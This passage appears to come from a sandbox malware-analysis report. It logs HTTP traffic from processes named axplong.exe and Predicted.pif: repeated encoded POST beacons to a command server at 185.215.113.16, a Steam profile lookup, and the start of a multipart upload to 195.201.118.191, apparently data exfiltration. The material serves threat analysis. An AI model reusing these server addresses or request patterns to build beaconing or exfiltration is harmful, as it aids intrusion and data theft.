Aug 19, 2024 06:06:17.193347931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	49888	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:17.204256058 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:17.957115889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	49889	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:18.078938961 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:18.846900940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	49891	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:18.857719898 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:19.638437986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	49892	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:19.760255098 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:20.534248114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	49893	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:20.543519974 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:21.323568106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	49894	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:21.443511963 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:22.201293945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	49895	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:22.209403038 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:22.982702017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	49897	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:23.094830990 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:23.834549904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49898	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:23.846477032 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:24.608968973 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	49900	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:24.720007896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:25.487914085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49902	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:25.497957945 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:26.281075001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	49903	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:26.391483068 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:27.159770966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	49904	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:27.176516056 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:27.937221050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	49905	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:28.047694921 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:28.798105001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	49906	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:28.807378054 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:29.580032110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	49907	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:29.703985929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:30.491332054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49839	23.210.122.61	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:05:53 UTC	119	OUT	GET /profiles/76561199751190313 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:05:53 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 19 Aug 2024 04:05:53 GMT Content-Length: 34740 Connection: close Set-Cookie: sessionid=774334b0a79c34fda0a6f043; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-08-19 04:05:53 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-08-19 04:05:53 UTC	10062	IN	Data Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
2024-08-19 04:05:53 UTC	10164	IN	Data Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 Data Ascii: mmunity.akamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49842	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:05:54 UTC	215	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:05:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:05:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:05:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49844	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:05:55 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
